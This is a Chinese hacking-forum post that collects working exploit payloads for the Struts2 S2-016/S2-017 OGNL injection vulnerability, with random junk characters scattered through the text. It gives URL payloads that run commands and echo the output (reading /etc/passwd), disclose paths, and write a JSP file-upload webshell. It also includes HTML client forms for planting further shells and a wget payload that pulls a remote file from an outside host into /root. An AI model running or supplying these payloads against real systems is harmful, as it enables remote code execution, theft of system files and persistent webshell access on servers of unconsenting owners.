找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2823|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
- x# |/ O; i+ D$ O
, T2 A2 u# }( l喜欢就点一下感谢吧^_^& V6 E& a( C; P* E
0 }3 i! K3 v+ {: e) \5 R, O' W) B
带回显命令执行:
' G% ]" _$ Y. H0 z8 |; u6 U! j" X0 X
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
* D$ H4 x, z3 Y  V& P. q) O1 y
$ Q) Z/ n' Q! z; v2 H8 ^
. V" d* |- D3 Y) C3 I2 Q3 K
' \& M0 R; h) m8 o/ d& P4 E1 z
% d, x& y- G! l& m$ P! k% U% R# P, V
) [! M% Z- o' P8 x( |

6 u! k: j$ ^. v" A' Q: a3 Z6 V. d爆路径:
$ P5 S( R) m% h! j) v
) I+ C0 l, S% ?4 B6 f4 shttp://www.example.com/struts2-b ... 8%29.close%28%29%7D  ~/ r3 l( l8 I4 q! t

% E' l' w# L/ j: N  b' j$ C' I2 H% X  v& o% o
* U9 v9 l0 [0 s3 V5 ]

7 F$ d( c# S# W3 V5 S4 N4 X7 N$ ~6 u( K5 C% y" r3 Q
写文件:
1 m* A% m0 n! n) k; }/ I6 h5 U+ q; F: {: J. l. |0 _5 ~, r! s
http://www.example.com/struts2-blank/example/X.action?redirect:${
: e1 F, o& m4 K4 U" f9 l& K: _/ e' a$ B' f. O7 s; [
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),* b8 ^$ \7 U" L. o6 M& Y

: _2 f& A' \; ^: k%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
% O4 Y, e9 Z2 v" a% Z6 \+ ]2 t% E6 O
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
& w3 y+ {  G+ i" n4 g- w* q- l" [* q; Q  e* N, h; w
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e; x5 h5 F& i# V0 c, ~4 i; U/ N

& P" _1 d& F( d: c
* p9 ]. E5 Q' p* q6 X, x1 s, \  u/ g* F- X" }3 `% L* c
写入的文件内容:( E. Q( x/ d8 D1 U% v- M9 g+ q
# q& V8 `) K& S2 e% ?6 y$ c
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
2 W9 J, _5 H5 ]# x/ _+ M4 @; @7 u6 [* A; C7 z, E
其实就是一个jsp的小马,需要客户端配合                                                                                 
( ~5 y9 O+ U( O- P0 a1 a
6 q! ^& V9 P8 @7 Y" ]- C4 L8 |函数f是文件名,t是内容& J" g3 D5 `" i0 W
2 N' L' b0 x( q0 U' Z  e9 V
客户端:+ f& y! m9 r. K# J& w  K

7 @; k' I) B% w, ?7 ?<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
2 `) Q& N2 T$ D, C& j7 n1 C
( k! z1 e$ J$ K- ^" l, T<textarea name=t cols=120 rows=10 width=45>your code</textarea>- z0 m1 t% Y( c: g) _& ]% t$ ^

+ t5 M( f# D; R5 x) ~<center>
% r5 d, h6 H, D( b
) A8 ?) u+ f; z% R$ O  ^: G% `/ v9 q- f8 C
3 `: b& J" D: v. z
<input type=submit value="提交">
) P# B8 c' E5 ~& ]
- l7 p! B0 b. O9 f( C</form>
8 F4 G4 Z' @+ U" V& o0 ]
  H" H( n# k, g6 R; q) |0 ]4 c4 N就在当前目录建立一个fjp.jsp
/ d# Z& O1 B+ O* H% B6 b' j) j( S, O3 |: @# R
shell:http://www.example.com/struts2-blank/example/fjp.jsp
! ]. v" y! ^* F# F7 C( ?
- E1 E5 ~4 F! S) z5 x; ?/ D. x! P  @/ S8 b% P% p& a& ?8 x6 C

! v8 e  ^+ [5 J1 t+ x" V还有@园长的一个客户端:
) j! b6 U" S$ R% X4 D9 r+ A4 r* ]9 J
6 S4 w6 r0 ~" H, x8 Y6 p<html>6 h" ]3 @3 P% g6 f* y; I+ w/ ~

+ {) z% v( ?; W<head>
' ]- J! }/ ~4 T! ]  ~- _
" G" N- y, N# l- g+ k<meta http-equiv="content-type" content="text/html;charset=utf-8">! T( U" g6 f% I$ P, I# e
3 ~4 A: u/ V, F- x8 Z& ^
<title>jsp-园长</title>
0 X+ _, q6 G: s, w9 i4 g
7 A, R- a( ?: t6 S8 C' Z</head>
6 i6 z/ |5 T% W9 l5 c* L( f
" k+ i# ~/ L' ~) `% E5 \) B! ]<style>  a  Y" \, M2 ~; }

) e: W/ I4 A8 P6 f* k3 V+ t.main{width:980px;height:600px;margin:0 auto;}
8 T" l+ y7 C7 c4 c- h3 _7 B9 m7 g+ b
.url{width:300px;}
: S' ], S. s$ M" p) `3 q# ^# R3 [
.fn{width:60px;}
. [0 p* i6 l% M2 i2 d
5 s& Z  z- s% Y* t.content{width:80%;height:60%;}) c6 c0 i# Z& h8 f& f7 @
! b; b! k8 @+ a6 ^
</style>
) V( s- z* V* O0 k, i: u; T
7 a3 e0 d- i; z: X# {<script>) W) F4 j! O3 }" ^; M  ^

& \5 u6 X+ R8 c8 r  function upload(){
& L/ G8 M) L3 M+ D" |* t1 N& _: S. x: F
    var url = document.getElementById('url').value,
) W' c% k5 z: U  ^8 w- c" W
3 Z7 N) n1 p5 B      content = document.getElementById('content').value,% k& c1 W3 K# e; D1 \" B
: K8 o' N- x9 J' O; P' p9 T
      fileName = document.getElementById('fn').value,
& w# U$ u0 i, X3 t4 ?$ \% Y
  L# Z: i  z* C4 ~. b  f, l      form = document.getElementById('fm');: V2 v. A+ j& n1 F0 @
( G. u+ m0 _$ _: `) H
    if(url.length == 0){
1 {" a) ?. U) `/ x
/ |) m) }7 T7 @8 ~3 \  ~      alert("Url not allowd empty!");. {9 n! p- G  N. g4 Z) @

; X' l' G, p( B9 B/ ]      return ;
4 h$ h2 L3 l$ [
$ F3 G+ m+ J! R9 {$ w$ ]- ~' s    }  T7 e% m$ B: |6 N
- g) s6 z) s  n7 g, P$ W( ]
    if(content.length == 0){, V% i& [- A$ |* Z/ J

9 e1 m! t8 r7 k6 `      alert("Content not allowd empty!");
2 Y' j3 P7 H0 N6 t6 r# B9 H: T, |% m& C/ E: X: l" b
      return ;0 `3 w# X6 W4 g+ N' _* p  _, g# ~4 S
8 P1 [, A+ p  C* e2 b9 c: T- M
    }5 m  p2 B; t3 P

; j3 g9 Q$ o# z+ [- C2 |# V, x    if(fileName.length == 0){
. ^, D1 J& l: @# Y9 m' O! {
* A! D) R8 m! C      alert("FileName not allowd empty!");7 [/ W  ?0 b+ _7 h* y$ b- c

8 Q3 R& ]' j' [( J" o! F8 `1 O4 T      return ;, ?, q1 R, i, P9 k

" V  Y( A9 x$ V  o0 ~# O2 R    }
4 U1 A0 W6 @+ u4 Y
: p' Y7 g+ U( G* j4 h7 t$ m    form.action = url;1 N$ \! i  h, R$ I. D
# m* j$ q" t& P; ^7 U0 u
    form.submit();
/ N1 z1 ~. C( V9 A
& R% ~7 E7 v' M' p  }; E: d. r( S7 i! R) ~. J6 f

, G0 [4 O8 S6 B5 D! \# B4 H3 m8 w</script>
1 S5 L9 |. G1 C5 G0 X0 U: I2 {
/ n+ {/ O6 K7 @2 [, B( M<body>) W5 S5 Q  d" @
$ g! W  g5 f0 Q# R" E1 J% w
<div class="main">
. d. G7 L' J( R# ]" p% ^: i! Z: m( r$ U& x4 _
  <form id="fm" method="post">  % c  ~; i. Z1 A0 Y1 \

& f* m7 L% K% o/ y    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  6 K/ ?" i1 g- O' U+ Z

" Q- e4 u. k8 b4 f  O9 e    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ; \  S1 v2 E8 J* L# V/ S0 g

$ D7 e. r3 c  j5 ]9 g    <a href="javascript:upload();">Upload</a>, f6 h  `1 c* W' i* w) H

9 L0 e( O1 W2 m  f8 d/ M0 P5 X1 k4 }& z* s6 O$ }, `
/ ^6 p" C) k# P& V. f
    <textarea id="content" class="content" name="t" ></textarea>
" k5 D3 k/ A5 e" Q, ~  N4 I& b1 W$ s& @. t5 a. G
  </form>: G7 Z$ V  p3 {9 j$ T8 D7 L8 z/ g6 Q

+ D) c4 m% l. T$ ]9 d</div>
5 e) I, o) ~/ A$ p
. U) {3 H7 s5 E7 \& d, w  E1 h</body>; C7 @' f" u$ f& ]0 S; q4 T

1 M, F; e% @0 n: c2 s0 t</html>: U  w: n1 H1 P9 T
. s9 o, d9 f- j! \

1 B# R0 ^$ b( [4 S/ C8 b
5 ?( D+ K. d/ k* F0 b# @还有@X发的一个wget的getshell
4 o6 q/ m& p: N. m4 |; b- f$ L
: X) X" W' X1 `" V$ r?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}8 l2 |" Y. r( m) G" S# W
! x5 }0 ?$ \- y$ Y
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
" E7 X; |! b3 M9 Q1 m9 d4 d) O复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表